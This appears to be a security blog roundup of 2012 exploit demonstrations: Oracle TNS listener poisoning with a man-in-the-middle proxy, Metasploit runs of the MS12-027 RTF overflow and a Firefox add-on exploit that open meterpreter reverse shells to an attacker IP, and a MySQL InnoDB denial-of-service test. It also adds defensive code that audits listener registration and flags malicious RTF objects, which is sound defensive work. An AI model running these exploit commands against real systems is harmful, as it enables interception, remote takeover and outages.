CVE-2012-1675 Oracle Database TNS Poison 0Day Video Demonstration

Timeline :

Vulnerability discovered by Joxean Koret in 2008
Vulnerability reported to the vendor by Joxean Koret in 2008
Public release of the vulnerability in the Oracle CPU by the vendor on 2012-04-17
Details and PoC of the vulnerability released by Joxean Koret on 2012-04-18
Fake patching of the vulnerability discovered by Joxean Koret on 2012-04-26

PoC provided by :

Joxean Koret

Reference(s) :

Oracle CPU of April 2012
Joxean Koret details and PoC
CVE-2012-1675
Oracle Security Alert for CVE-2012-1675

Affected version(s) :

All versions of Oracle Database

Tested with :

Oracle Database 10g Enterprise Edition Release 10.2.0.4.0

Description :

Joxean Koret's PoC requires that the database name be exactly 6 characters long.

Database server characteristics :

IP : 192.168.178.150
Oracle version : 10.2.0.4.0
Database listener port : 1521
Database listener has no client IP restrictions
Database name : arcsig
Database username : arcsig
Database password : testtest

Database client characteristics :

IP : 192.168.178.151
SQL*Plus version : 10.2.0.4.0

"tnsnames.ora" file as below:

TARGET.DB=
(DESCRIPTION =
(ADDRESS = (PROTOCOL = TCP)(HOST = 192.168.178.150)(PORT = 1521))
(CONNECT_DATA =
(SERVICE_NAME= arcsig)
)
)

Attacker characteristics :

IP : 192.168.178.100
Usage of PoC provided by Joxean Koret

Demonstration :

PoC validation phase

On database server :

ifconfig
ps faux
netstat -tan

On database client :

ifconfig
sqlplus -v
cat tnsnames.ora
sqlplus [email protected]
HELP
QUIT

PoC exploitation phase

On attacker :

Start the MITM proxy, which will intercept the communication between the client and the database:

sudo python proxy.py -l 192.168.178.100 -p 1521 -r 192.168.178.150 -P 1521

Start the vulnerability exploitation :

python tnspoisonv1.py 192.168.178.100 1521 arcsig 192.168.178.150 1521

On the database client :

Connect with SQL*Plus
sqlplus [email protected]
?
? INDEX
TOTO
QUIT

You can see that the communication is intercepted by the proxy.
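The condition the demonstration above depends on is the one listed under the server characteristics: a listener that accepts service registration from any host. The following is added example code (mine, not from the post or from Oracle) that audits a listener.ora for the registration restriction Oracle's security alert describes, the Class of Secure Transport parameter SECURE_REGISTER_<listener_name>, and for the later VALID_NODE_CHECKING_REGISTRATION_<listener_name> alternative that I know from 11.2.0.4/12c releases. Both listener.ora samples are constructed; the hardened one only accepts registration over the local IPC endpoint, so a remote host cannot register an instance over TCP.

```python
import re

# Constructed listener.ora samples (added here; not files from the post).
# WEAK_LISTENER_ORA mirrors the demonstrated setup: a TCP listener with no
# restriction on which endpoints may register a service.
WEAK_LISTENER_ORA = """
LISTENER =
  (DESCRIPTION_LIST =
    (DESCRIPTION =
      (ADDRESS = (PROTOCOL = TCP)(HOST = 192.168.178.150)(PORT = 1521))
    )
  )
"""

# HARDENED_LISTENER_ORA adds the Class of Secure Transport (COST) setting from
# Oracle's alert: instance registration is accepted only over the local IPC
# endpoint, so a remote host cannot register a fake instance over TCP.
HARDENED_LISTENER_ORA = """
LISTENER =
  (DESCRIPTION_LIST =
    (DESCRIPTION =
      (ADDRESS = (PROTOCOL = TCP)(HOST = 192.168.178.150)(PORT = 1521))
      (ADDRESS = (PROTOCOL = IPC)(KEY = EXTPROC1521))
    )
  )

# Accept service registration over IPC only
SECURE_REGISTER_LISTENER = (IPC)
"""


def registration_protocols(listener_ora, listener_name="LISTENER"):
    """Return the set of protocols allowed to register with the named listener
    by SECURE_REGISTER_<listener>, or None if the parameter is not set."""
    pattern = r"^\s*SECURE_REGISTER_%s\s*=\s*\(([^)]*)\)" % re.escape(listener_name)
    m = re.search(pattern, listener_ora, re.MULTILINE | re.IGNORECASE)
    if not m:
        return None
    return {p.strip().upper() for p in m.group(1).split(",") if p.strip()}


def valid_node_checking(listener_ora, listener_name="LISTENER"):
    """Return the value of VALID_NODE_CHECKING_REGISTRATION_<listener>
    (the 11.2.0.4/12c-style alternative to COST), or None if absent."""
    pattern = r"^\s*VALID_NODE_CHECKING_REGISTRATION_%s\s*=\s*(\w+)" % re.escape(listener_name)
    m = re.search(pattern, listener_ora, re.MULTILINE | re.IGNORECASE)
    return m.group(1).upper() if m else None


def audit_registration(listener_ora, listener_name="LISTENER"):
    """Return (restricted, reason). restricted is False when the listener will
    accept a service registration from any TCP client, which is the condition
    the demonstration relies on."""
    protocols = registration_protocols(listener_ora, listener_name)
    if protocols is not None:
        if "TCP" in protocols:
            return False, "SECURE_REGISTER still allows registration over TCP"
        return True, "registration limited to " + ", ".join(sorted(protocols))
    vnc = valid_node_checking(listener_ora, listener_name)
    if vnc in ("ON", "LOCAL", "SUBNET"):
        return True, "VALID_NODE_CHECKING_REGISTRATION=" + vnc
    return False, "no registration restriction: any host can register a service"


if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_LISTENER_ORA), ("hardened", HARDENED_LISTENER_ORA)):
        restricted, reason = audit_registration(cfg)
        print("%-8s restricted=%s  %s" % (label, restricted, reason))
```

Run it against a copy of the real listener.ora by reading the file into `audit_registration`. Whether COST is available for a given 10g or 11g patch level, and whether a RAC deployment needs TCPS rather than IPC, is release-specific and should be taken from the Oracle alert for CVE-2012-1675, not from this script.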

MS12-027 MSCOMCTL ActiveX Buffer Overflow Metasploit Demo

Timeline :

Vulnerability reported by Unknown to the vendor
Public release of the vulnerability on 2012-04-10
Vulnerability found exploited in targeted attacks on 2012-04-12
Metasploit PoC provided on 2012-04-23

PoC provided by :

Unknown
juan vazquez
sinn3r

Reference(s) :

CVE-2012-0158
MS12-027
OSVDB-81125

Affected version(s) :

Microsoft Office 2003 SP3
Microsoft Office 2003 Web Components SP3
Microsoft Office 2007 SP2
Microsoft Office 2007 SP3
Microsoft Office 2010 32-bit
Microsoft Office 2010 SP1 32-bit
Microsoft SQL Server 2000 Analysis SP4
Microsoft SQL Server 2000 SP4
Microsoft SQL Server 2005 Express Edition with Advanced SP4
Microsoft SQL Server 2005 for 32-bit SP4
Microsoft SQL Server 2005 for x64-bit SP4
Microsoft SQL Server 2008 for 32-bit SP2
Microsoft SQL Server 2008 for 32-bit SP3
Microsoft SQL Server 2008 for x64-bit SP2
Microsoft SQL Server 2008 for x64-bit SP3
Microsoft SQL Server 2008 R2 for 32-bit
Microsoft SQL Server 2008 R2 for x64-bit
Microsoft BizTalk Server 2002 SP1
Microsoft Commerce Server 2002 SP4
Microsoft Commerce Server 2007 SP2
Microsoft Commerce Server 2009
Microsoft Commerce Server 2009 R2
Microsoft Visual FoxPro 8.0 SP1
Microsoft Visual FoxPro 9.0 SP2
Visual Basic 6.0 Runtime

Tested on Windows XP Pro SP3 with :

Microsoft Office Word 2007 (12.0.4518.104)

Description :

This module exploits a stack buffer overflow in MSCOMCTL.OCX. It uses a malicious RTF to embed the specially crafted MSComctlLib.ListViewCtrl.2 control, as exploited in the wild in April 2012. This module targets Office 2007 and Office 2010. The DEP/ASLR bypass on Office 2010 is done with the Ikazuchi ROP chain proposed by Abysssec. This chain uses "msgr3en.dll", which is loaded after Office has started, so the malicious file must be opened through "File / Open" to achieve exploitation.

Commands :

use exploit/windows/fileformat/ms12_027_mscomctl_bof
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.21.47
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.21.47
exploit -j

getuid
sysinfo
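A file-triage check for the document type described above, written from the defender's side: given an RTF, flag an embedded MSComctlLib.ListViewCtrl.2 object either by its declared \objclass name or by its CLSID serialised inside \objdata, since a sample may omit or obfuscate one of the two. This is added example code, not from the post or from Metasploit; the CLSID value is assumed from public CVE-2012-0158 detection signatures, and both RTF samples are constructed.

```python
import re

# CLSID of MSComctlLib.ListViewCtrl.2, the control named in the description.
# Assumed from public CVE-2012-0158 detection signatures; it is not in the post.
LISTVIEW_CLSID = "BDD1F04B-858B-11D1-B16A-00C0F0283628"

OBJCLASS_RE = re.compile(r"\\objclass\s+([A-Za-z0-9_.]+)")
OBJDATA_RE = re.compile(r"\\objdata\b\s*([0-9A-Fa-f\s]+)")


def clsid_to_le_hex(clsid):
    """Serialise a GUID string as it is stored in OLE structures: the first three
    fields little-endian, the last two in order. Returns lowercase hex."""
    d1, d2, d3, d4, d5 = clsid.strip("{}").split("-")
    raw = (bytes.fromhex(d1)[::-1] + bytes.fromhex(d2)[::-1]
           + bytes.fromhex(d3)[::-1] + bytes.fromhex(d4) + bytes.fromhex(d5))
    return raw.hex()


def extract_objdata(rtf):
    """Return each \\objdata hex payload with whitespace removed, lowercased."""
    return [re.sub(r"\s+", "", m.group(1)).lower() for m in OBJDATA_RE.finditer(rtf)]


def scan_rtf(rtf):
    """Return a list of findings that indicate an embedded ListViewCtrl.2 object.
    Two independent indicators are checked: the declared \\objclass name and the
    serialised CLSID inside \\objdata, since either may be absent or obfuscated."""
    findings = []
    for cls in OBJCLASS_RE.findall(rtf):
        if cls.lower().startswith("mscomctllib.listviewctrl"):
            findings.append("objclass declares " + cls)
    clsid_hex = clsid_to_le_hex(LISTVIEW_CLSID)
    for index, data in enumerate(extract_objdata(rtf)):
        if clsid_hex in data:
            findings.append("objdata #%d contains ListViewCtrl.2 CLSID" % index)
    return findings


# Constructed samples (not real documents). The object data below is filler
# bytes around the serialised CLSID, not a genuine OLE stream.
BENIGN_RTF = r"{\rtf1\ansi Quarterly report, no embedded objects.}"
SUSPICIOUS_RTF = (
    r"{\rtf1\ansi{\object\objemb{\*\objclass MSComctlLib.ListViewCtrl.2}"
    + "{\\*\\objdata 01050000020000001a000000\n"
    + clsid_to_le_hex(LISTVIEW_CLSID) + "\n0000000000000000}}}"
)


if __name__ == "__main__":
    for name, doc in (("benign", BENIGN_RTF), ("suspicious", SUSPICIOUS_RTF)):
        print(name, scan_rtf(doc) or "no indicators")
```

The regexes here assume a plainly written RTF; real samples frequently break up control words and hex runs to defeat exactly this kind of matching, so for production triage feed the \objdata payloads through a proper RTF object extractor (for example rtfobj from oletools) and run the CLSID check on what it recovers.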

Mozilla Firefox Bootstrapped Add-on Social Engineering Code Execution Metasploit Demo

Timeline :

Vulnerability found by Jason Avery on 2007-06-27
Metasploit PoC provided on 2012-04-10

PoC provided by :

mihi

Reference(s) :

None

Affected version(s) :

All versions of Mozilla Firefox

Tested on Windows XP Pro SP3 with :

Mozilla Firefox 11.0

Description :

This exploit dynamically creates a .xpi add-on file. The resulting bootstrapped Firefox add-on is presented to the victim via a web page. The victim's Firefox browser will pop up a dialog asking whether they trust the add-on. Once the user clicks "Install", the add-on is installed and executes the payload with full user permissions. As of Firefox 4, this works without a restart because the add-on is marked as "bootstrapped". As the add-on would execute the payload after each Firefox restart, an option can be given to automatically uninstall the add-on once the payload has been executed.

Commands :

use exploit/multi/browser/firefox_xpi_bootstrapped_addon
set SRVHOST 192.168.178.100
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

getuid
sysinfo

Oracle MySQL InnoDB Bugs 13510739 and 63775 DoS Demo

Timeline :

Public release of the vulnerabilities on 2012-03-21
Details of the vulnerability published by Oracle on 2012-04-10
PoC provided by Oracle on 2012-03-21 in the source code of 5.5.22 and 5.1.62

PoC provided by :

Oracle

Reference(s) :

SA48744
MySQL 5.5.22 release note
MySQL 5.1.62 release note
Eric Romang Pastebin

Affected version(s) :

MySQL Server 5.5.21 and previous versions
MySQL Server 5.1.61 and previous versions

Tested on Centos 5 with :

MySQL 5.5.21

Description :

Oracle released, on 21 March, two new versions of MySQL, 5.5.22 and 5.1.62. These versions fix two bugs, #13510739 and #63775, which are considered security fixes. However, no impact details are provided for these bugs and the bug reports are closed.
Unfortunately for Oracle, the two new versions shipped with a development script, "mysql-test/suite/innodb/t/innodb_bug13510739.test", used to test the fix for the vulnerabilities: effectively a PoC provided by Oracle. The bugs cause a denial of service of MySQL "ON HANDLER READ NEXT AFTER DELETE RECORD". All the details are available in the script or at the Pastebin link above.

Commands :

mysql -u root -p database < innodb_bug13510739.test